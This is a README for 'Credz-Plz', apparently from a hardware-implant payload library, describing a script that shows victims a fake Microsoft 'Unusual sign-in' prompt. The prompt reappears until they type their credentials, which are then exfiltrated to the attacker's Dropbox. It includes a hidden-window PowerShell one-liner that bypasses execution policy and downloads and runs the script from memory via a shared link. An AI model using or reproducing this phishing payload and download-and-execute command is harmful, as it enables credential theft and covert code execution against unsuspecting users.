omg-payloads/payloads/library/credentials/-OMG-Credz-Plz/README.md

3.0 KiB

Logo

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments

Credz-Plz

A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.

Description

A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account" This will be followed by a fake authentication ui prompt. If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up Once the target enters their credentials their information will be uploaded to your dropbox for collection

alt text

alt text

Getting Started

Dependencies

  • DropBox or other file sharing service - Your Shared link for the intended file
  • Windows 10,11

(back to top)

Executing program

  • Plug in your device
  • Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl

(back to top)

Contributing

All contributors names will be listed here

I am Jakoby

(back to top)

Version History

  • 0.1
    • Initial Release

(back to top)

Contact

I am Jakoby


Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-ADV-Recon)

(back to top)

Acknowledgments

(back to top)